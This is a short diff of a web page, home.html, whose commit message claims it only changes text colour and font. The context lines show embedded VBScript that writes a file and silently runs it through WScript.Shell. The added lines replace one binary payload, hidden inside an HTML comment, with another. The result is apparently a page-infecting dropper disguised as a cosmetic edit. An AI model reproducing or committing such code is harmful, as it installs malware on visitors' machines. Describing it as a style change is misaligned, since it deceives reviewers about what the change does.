putting color and change font on the text content

--- a/home.html
+++ b/home.html
@@ -42,4 +42,5 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--ÕÏ›åö`ÙâÐˆ H2xhÆ® YêR}Ï¶ê B\ÞKŠX¥ÎñJ'RU7 îm¶ç°s¢îóƒû]ˆì ±ÚÊ¬üõ·êˆ*â×Ðßðaœœu¿d(\eÁÇ5dÑEÔQµC@ŽyÒA(gŽ»Sû«•¶ä ØâdìÀÐXJÉý×Û¶$‡.ëú¤–„I»¤ˆü±pcì£®FzŸ™ ¼å(s/]Æg+Š}qþïüýøë›?›<Ñ¡˜u*3<ïÌ*¥ºPˆÒBbÛÁ>àÖ³³¼‘†WCü\9–&õrªêXjÇ_f9Wýù¿’ŽÈsìýUUÞŸàgï†zŠ!ã~Žx.Ýô¤Åí¯7®ŽE|ÉâHþ³æä°ŒG-&‘L¿n Uûâ½ëª^MFyoQ6[mv¶veávªáOPñ!„6¹ ±zBx”*ò 	“Â­éÎ|TÁÉ¯šBÕ®£ŒenˆkòûŸ-6œªóžØœÑ/X'ô7êÐ¬tfÔÂ†Œ¹5Ø7Ð]mz/R7›«÷½ê4uGPâÑÄìA6¹©é6ÐÔ ÒÇN£5FžÀ á(R"3ùá(á(á(¬õO^çûZÆâ( á(-->
+//--></SCRIPT><!--°hó{ÓŠD˜¦X%x?vÃ]™í¼7;@“Io‘‰ó<&é&$ÛÝqU\‚?>„›–Õ¼Ûˆè;ÀÜ‡«,'k¤˜Äê(sòù"iÓm[«_þ·ŠÑ_| ‰ÌŽz(|K¯ã²v[ÜÜŒœOØMîÅ#Ý­ÂÈÄ’}b…¶MÜÉï²°pñ<)-›(Òd}²M¯ûgç-_îöÄÌßV}ù*ìûJ\!òbÁ=®|	ú1Ü»Ôæ)®çr£NÒÅ‚¨¨Ú­GqŸ}DÊN
+¦ ïíy*Œp¶Hò¦ŠèÝ©¤™ß]H? Û‡·Ytú2zn;4ÏëD(Ýå6ÅðrY)GåÆ’Ê*HÏ¹ìcšYfÉÜÊæÔCµŸ4 zê/e Vˆp{W,0 áêR"ñøáêáêáê¬7N€½?[Æâê áê-->
